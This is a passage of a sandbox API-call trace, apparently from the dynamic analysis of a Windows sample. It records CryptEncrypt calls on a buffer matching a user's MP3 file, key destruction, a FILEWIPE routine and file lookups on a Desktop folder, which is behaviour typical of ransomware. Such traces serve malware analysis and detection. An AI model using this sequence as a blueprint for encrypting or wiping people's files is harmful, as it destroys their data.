returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.342] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2728 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0162.343] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.343] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2878 | out: hHeap=0x8a0000) returned 1 [0162.344] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0162.344] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df118 | out: hHeap=0x8a0000) returned 1 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.344] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0162.344] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.344] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.345] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.345] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.373] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0162.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.373] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.373] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.373] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.374] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.374] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.374] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x13156, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x13160) returned 1 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.374] CharLowerBuffW (in: lpsz="byte[78177]", cchLength=0xb | out: lpsz="byte[78177]") returned 0xb [0162.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.375] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.375] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0162.375] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.375] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa5b168*, pdwDataLen=0x87e820*=0x13156, dwBufLen=0x13160 | out: pbData=0xa5b168*, pdwDataLen=0x87e820*=0x13160) returned 1 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.376] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.376] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.376] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.376] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.376] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0162.376] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.381] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.387] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.387] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0162.387] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.387] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.387] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0162.387] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.387] CryptDestroyKey (hKey=0x90af98) returned 1 [0162.387] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.387] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.387] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.388] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.388] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87eb9c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eb9c) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.388] PeekMessageW (in: lpMsg=0x87e9d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9d4) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.388] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0162.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0162.388] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87eebc) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0162.388] PeekMessageW (in: lpMsg=0x87ecf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ecf4) returned 0 [0162.388] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.388] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.388] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0162.389] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.389] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0162.389] CryptReleaseContext (hProv=0x9c0c88, dwFlags=0x0) returned 1 [0162.389] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.389] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0162.389] PeekMessageW (in: lpMsg=0x87ece4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ece4) returned 0 [0162.389] FreeLibrary (hLibModule=0x74f20000) returned 1 [0162.389] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.389] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.389] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.389] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.390] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.391] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0162.391] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0162.391] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.392] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\LtZ4mBBPXnfPFiN1jbH3\\URxyJ_reG.mp3", lpFindFileData=0x87eda0 | out: lpFindFileData=0x87eda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xee7b3530, ftCreationTime.dwHighDateTime=0x1d5e6c7, ftLastAccessTime.dwLowDateTime=0x28370490, ftLastAccessTime.dwHighDateTime=0x1d5dd89, ftLastWriteTime.dwLowDateTime=0x28370490, ftLastWriteTime.dwHighDateTime=0x1d5dd89, nFileSizeHigh=0x0, nFileSizeLow=0x13156, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="URxyJ_reG.mp3", cAlternateFileName="URXYJ_~1.MP3")) returned 0x90af58 [0162.392] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0162.392] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.392] RtlAllocateHeap (HeapHandle=0x8a0000, 